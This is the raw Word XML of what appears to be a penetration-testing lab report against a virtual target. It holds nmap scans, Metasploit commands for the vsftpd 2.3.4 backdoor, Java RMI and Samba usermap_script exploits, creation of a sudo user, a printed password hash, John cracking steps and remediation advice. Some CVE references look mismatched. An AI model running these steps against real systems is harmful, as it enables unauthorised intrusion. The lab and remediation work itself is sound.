        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609B8F9B" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE120EC" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B8E1FD" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C2821A" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3505D518" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCCD5A8" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:right="5134" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 3: Operating System Detection nmap -v -O 192.168.1.100 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2D6300" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 3 - Enumeration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343BD017" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Target IP Address – 192.168.1.100 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AADB11" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Operating System Details - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A31DC7" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MAC Address: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>08:00:27:A1:D7</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">:BC (VirtualBox) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABA25D9" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Running: Linux 2.6.X </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424AC568" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:right="5233" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OS CPE: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cpe:/o:linux</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4983FCE0" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6788EBE6" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="44"/>
        <w:ind w:left="-5" w:right="6017" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4- Exploitation of services</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vsftpd 2.3.4 Backdoor msfconsole search vsftpd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACEBE2F" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:right="5154" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">use exploit/unix/ftp/vsftpd_234_backdoor set RHOST 192.168.1.100 run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3862CC91" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1"/>
        <w:ind w:left="-5" w:right="7277" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Java RMI Server msfconsole search java_rmi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414EB90F" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">use exploit/multi/misc/java_rmi_server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041E3AE3" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:right="6658" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">set RHOST 192.168.1.100 set RPORT 50918 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>run</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C5C00E" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1"/>
        <w:ind w:left="-5" w:right="4155" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Samba "username map script" Command Execution msfconsole search samba </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B65854B" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:right="5221" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">use exploit/multi/samba/usermap_script set RHOST 192.168.1.100 set SMBUser=root run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B76E87" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">... </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58181A8A" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="161"/>
        <w:ind w:left="356" w:right="47" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Task 5 - Create user with root permission </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBF16BF" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:firstLine="361"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">adduser </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>yash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D86578" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:firstLine="361"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">  1234</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B97C65" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:firstLine="361"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sudo usermod -aG sudo yash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE5F354" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:firstLine="361"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cat /etc/passwd | grep yash </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B49FAD" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:firstLine="361"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">yash:x:1003: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1003:yash</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">,1,1,1,1:/home/yash:/bin/bash  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5E989A" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:firstLine="361"/>
      </w:pPr>
      <w:r>
        <w:t>yash: $1$r4h71vUj$.NleiCm1eVnnUQ5sFqxAs0:20224:0:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>99999:7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A10FD05" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C7A80C" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="161"/>
        <w:ind w:left="10" w:right="47" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Task 6 - Cracking password hashes </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E86982C" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:firstLine="361"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nano hash.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C889238" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:firstLine="361"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">John hash.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5E5E0F" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="6" w:line="404" w:lineRule="auto"/>
        <w:ind w:firstLine="361"/>
      </w:pPr>
      <w:r>
        <w:t>John hash.txt –</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">show  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 – Remediation </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054B5EFD" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="161"/>
        <w:ind w:left="356" w:right="47" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MSF Exploit: vsftpd 2.3.4 Backdoor </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3787B500" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="409" w:lineRule="auto"/>
        <w:ind w:right="6048" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Current </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>version :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.3.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
        </w:rPr>
        <w:t>➢</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Vulnerability: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C379777" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBAA199" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">version 2.3.4 contains a backdoor that allows a malicious attacker to gain a shell by connecting with a username that ends with a smiley ":)" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D63DAE" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0309008D" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="410" w:lineRule="auto"/>
        <w:ind w:right="6048" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE: CVE-2011-2523 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:eastAsia="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
        </w:rPr>
        <w:t>➢</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Reference: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B66C784" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="162"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0100BF78" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:right="6048" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BDFEA8" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:hanging="361"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DF33B9" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="163"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D02395" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="361"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Upgrade vsftpd to 2.3.5 or later. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F1D78E" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="162"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE746E9" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="361"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avoid downloading software from untrusted sources. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66986129" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="162"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED4604C" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="361"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Restrict access to FTP services using firewalls. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347F2DDC" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:right="47" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Java RMI Server Insecure Configuration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0F1A48" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746FE8F6" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0449170A" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Java RMI (Remote Method Invocation) service exposes unsafe endpoints that may allow remote code execution due to insecure default configuration. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03057CE1" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                      CVE: CVE-2015-2370 and others related </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04947798" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBCAA02" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="162"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D2EA81" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable RMI or use secure RMI registries with access control. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547B34F9" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="161"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AC13B2" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use a firewall to restrict access to RMI ports (commonly 1099). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057C41F9" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="157"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFBAAAD" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Update to the latest Java Runtime Environment (JRE). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CF71AE" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7849214F" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="170"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288FD2B4" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:right="2509" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reference: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309318BC" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="410" w:lineRule="auto"/>
        <w:ind w:right="2509" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Metasploit Module </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Java Security Best Practices </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1628B9DE" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="161"/>
        <w:ind w:right="47" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Samba LSA Transnames Heap Overflow </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336F3DC2" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="166"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA11996" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="165"/>
        <w:ind w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385F6EBA" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="165"/>
        <w:ind w:left="-5" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Samba versions before 3.3.13, 3.4.6, and 3.5.1 are vulnerable to a heap overflow via the LSA (Local Security Authority) trans_names call. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4027AA3D" w14:textId="77777777" w:rsidR="00D37DE4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="164"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
